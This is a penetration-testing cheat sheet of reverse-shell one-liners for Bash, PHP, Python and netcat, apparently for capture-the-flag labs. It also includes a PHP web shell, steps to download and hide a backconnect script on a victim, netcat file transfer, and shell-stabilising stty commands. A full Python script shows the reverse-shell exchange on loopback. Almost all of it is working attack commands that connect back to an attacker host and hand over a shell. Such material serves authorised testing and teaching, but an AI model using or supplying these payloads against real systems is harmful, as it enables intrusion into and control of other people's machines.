Reverse Shell
Bash
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
bash -c 'bash -i >& /dev/tcp/10.0.0.1/8080 0>&1'
PHP
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
<?php system($_GET['cmd']); ?>
echo system($_REQUEST['cmd']); # wrap in <?php ... ?> tags; $_REQUEST takes the parameter from GET or POST
Trigger it with: /file.php?cmd=whoami
Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
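A local, end-to-end version of the two one-liners above, added here as an illustration and not part of the original cheat sheet or of any project it links to. The listener (the nc -lvnp side) and the connect-back side run in one process on 127.0.0.1 so the exchange can be executed offline; the port, the helper names and the commands sent are assumptions for the demo. The use_pty option reproduces the second one-liner (socket onto fds 0/1/2, then pty.spawn), and sending tty shows what it buys: without a pty the shell reports "not a tty", which is why the Improving Shells section below exists.

```python
import os
import pty
import socket
import subprocess
import sys
import threading


def pty_available():
    """True if this box can allocate a pty (needed only for the use_pty demo)."""
    try:
        m, s = pty.openpty()
        os.close(m)
        os.close(s)
        return True
    except OSError:
        return False


def victim(port, use_pty, result):
    """'Victim' side (assumed helper): connect back and give the socket to a shell as fds 0, 1, 2."""
    s = socket.create_connection(("127.0.0.1", port))
    if use_pty:
        # Same shape as the second one-liner: stdio is the socket, pty.spawn puts sh on a real terminal
        cmd = [sys.executable, "-c", "import pty; pty.spawn('/bin/sh')"]
    else:
        cmd = ["/bin/sh"]
    # Popen dup2()s the socket onto fds 0, 1 and 2 of the child; that is exactly what the
    # three os.dup2(s.fileno(), n) calls in the one-liner do by hand before calling the shell.
    proc = subprocess.Popen(cmd, stdin=s, stdout=s, stderr=s)
    s.close()  # the child holds its own copies; the listener sees EOF once the shell exits
    try:
        result["rc"] = proc.wait(timeout=30)
    except subprocess.TimeoutExpired:
        proc.kill()
        result["rc"] = proc.wait()


def reverse_shell_session(commands, use_pty=False):
    """'Attacker' side (assumed helper): listen on an ephemeral loopback port, accept the
    callback, send the commands, and return (everything the shell wrote, shell exit code)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))  # port 0: let the kernel pick a free port
    srv.listen(1)
    port = srv.getsockname()[1]
    result = {}
    t = threading.Thread(target=victim, args=(port, use_pty, result))
    t.start()
    conn, _ = srv.accept()
    conn.settimeout(30)
    conn.sendall(commands.encode())
    conn.shutdown(socket.SHUT_WR)  # EOF on the shell's stdin once our commands are consumed
    chunks = []
    while True:
        try:
            data = conn.recv(4096)
        except socket.timeout:
            break
        if not data:  # shell exited and every copy of the socket was closed
            break
        chunks.append(data)
    conn.close()
    srv.close()
    t.join()
    return b"".join(chunks).decode(errors="replace"), result.get("rc")


if __name__ == "__main__":
    out, rc = reverse_shell_session("id\ntty\necho on-stderr >&2\nexit 5\n")
    print(out, "exit code:", rc)
    if pty_available():
        print(reverse_shell_session("tty\nexit\n", use_pty=True)[0])
```

Note that stderr shows up on the same socket as stdout (the 2>&1 / dup2 onto fd 2 in the one-liners), and that with use_pty the output also contains the shell prompt and the echoed command text, which is the terminal behaviour the later stty steps then tidy up.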
python-pty-shells
https://github.com/infodox/python-pty-shells
Edit tcp_pty_backconnect.py so it points at the attacker's listener IP and port
On Victim (fetch the script from a web server on the attacker box, e.g. python -m http.server 8000 started in the repo directory)
wget IP:8000/tcp_pty_backconnect.py -O /dev/shm/.rev.py
On Attacker
python tcp_pty_shell_handler.py -b IP:PORT
On Victim
python /dev/shm/.rev.py
Netcat
nc -e /bin/sh 10.0.3.4 9001
Listen with
nc -lvnp 9001
nc -e /bin/bash 10.0.0.1 4242
nc -c bash 10.0.0.1 4242
-e and -c exist only in netcat-traditional and ncat; the OpenBSD netcat most distributions ship lacks them, so fall back to the named-pipe form:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4242 >/tmp/f
Downloading files with netcat
Open receiving connection
nc -lvnp 1234 > file.zip
Send the file over (-w 4 makes nc exit after 4 seconds of idle time, closing the transfer)
nc -w 4 <your_hackthebox_ip> 1234 < file_name.zip
Compare md5sum or sha256sum of the file on both ends to confirm nothing was truncated
MSFvenom
Improving Shells
python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
/usr/bin/script -qc /bin/bash /dev/null
import os; os.system('/bin/bash')   # from inside an interactive Python interpreter
/bin/sh -i
Once bash is running in the PTY, background the shell with Ctrl-Z
With the shell in the background, inspect the local terminal and its stty settings (these run on the attacking box; note the TERM value and the rows/columns from stty -a)
echo $TERM
stty -a
stty raw -echo
fg
Back in the remote shell, set the shell, terminal type and window size to match the local Kali window (values from the output above). The local terminal is now in raw mode, so reset is typed without seeing it echoed
reset
export SHELL=bash
export TERM=xterm-256color
stty rows 38 columns 116